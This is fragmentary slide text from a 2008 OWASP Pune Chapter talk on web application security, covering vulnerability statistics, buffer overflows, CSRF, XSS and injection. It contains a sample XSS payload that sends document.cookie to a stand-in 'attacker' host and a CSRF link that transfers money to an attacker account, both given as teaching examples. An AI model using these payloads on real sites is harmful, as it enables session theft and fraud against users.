Presentation at the OWASP Pune Chapter, Pune, India

1. Pune, India January 2008

2. SANS @RISK December 2007 3 Dec 10 Dec 17 Dec 24 Dec 31 Dec Total Microsoft Products 2 3 12 0 2 19 Mac 2 2 2 4 0 10 Linux 10 5 8 11 0 34 Unix, Solaris, etc 5 3 3 4 1 16 Network Device 1 3 1 1 1 7 Others ( various ) 31 33 30 37 16 147 Web Applications 70 34 52 35 52 243

8. OWASP Top 10 2004

12. Buffer 1 Return address Other data -------------- --------------

13. -------------- -------------- 90909090 90909090 90909090 90909090 90909090 Return Address Filled Buffer with NOP’s and Shellcode Shellcode

23. <a href=&quot;http://googlified.com.googlepages.com/contactlist.htm&quot;>

25. www.bank.com Victim Attacker Logging Request Auth Cookies Legitimate Requests Sends an email containing malicious href tag. Click Here Transfer Money <a href= http://www.bank.com/transfer.php?acc=attacker&amount=$10000 > 1 2 3 4 5 6 7

37. Reflected XSS BID - 21534

41. www.bank.com Victim Attacker Logging Request Auth Cookies Legitimate Requests Click Here Stolen Cookies 1 2 3 4 5 6 7 Sends malicious request <script>document. location=“http://attacker/steal_cookies.php?cookies=“+document. cookie</script>

46. Injection Flaws

63. Insecure Direct Object Reference

80. login.asp homepage.asp login.asp homepage.asp logoff Client Server GET www.abc.com www.abc.com/login.asp POST username + password www.abc.com/homepage.asp

81. login.asp authenticate.asp login.asp Redirect request logoff homepage.asp homepage.asp Client Server GET www.abc.com www.abc.com/login.asp POST username + password Redirect : www.abc.com/homepage.asp GET www.abc.com/homepage.asp www.abc.com/homepage.asp